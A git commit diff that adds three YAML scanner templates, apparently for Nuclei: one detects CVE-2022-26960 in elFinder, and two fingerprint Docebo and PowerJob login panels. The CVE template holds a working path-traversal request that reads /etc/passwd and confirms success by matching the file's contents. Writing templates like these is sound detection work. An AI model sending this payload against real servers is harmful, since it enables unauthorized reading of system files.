Merge pull request #4713 from pikpikcu/patch-331

Added CVE-2022-26960
2022-07-04 18:14:59 +05:30 · 2022-07-04 18:14:59 +05:30 · 2592e570d0
parent 48bbb42ce8 01e8acba05
commit 2592e570d0
3 changed files with 83 additions and 0 deletions
--- a/cves/2022/CVE-2022-26960.yaml
+++ b/cves/2022/CVE-2022-26960.yaml
@ -0,0 +1,31 @@
+id: CVE-2022-26960
+
+info:
+  name: elFinder - Path Traversal
+  author: pikpikcu
+  severity: high
+  description: |
+    Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
+  reference:
+    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
+  metadata:
+    verified: true
+  tags: cve,cve2022,lfi,elfinder
+
+requests:
+  - raw:
+      - |
+        GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
--- a/exposed-panels/docebo-elearning-panel.yaml
+++ b/exposed-panels/docebo-elearning-panel.yaml
@ -0,0 +1,26 @@
+id: docebo-elearning-panel
+
+info:
+  name: Docebo E-learning Login Panel
+  author: pikpikcu
+  severity: info
+  metadata:
+    verified: true
+    fofa-query: title="Docebo E-learning"
+  tags: panel,docebo
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Docebo E-learning"
+
+      - type: status
+        status:
+          - 200
--- a/exposed-panels/powerjob-panel.yaml
+++ b/exposed-panels/powerjob-panel.yaml
@ -0,0 +1,26 @@
+id: powerjob-panel
+
+info:
+  name: PowerJob Login Panel
+  author: pikpikcu
+  severity: info
+  metadata:
+    verified: true
+    fofa-query: title="PowerJob"
+  tags: panel,powerjob
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>PowerJob</title>"
+
+      - type: status
+        status:
+          - 200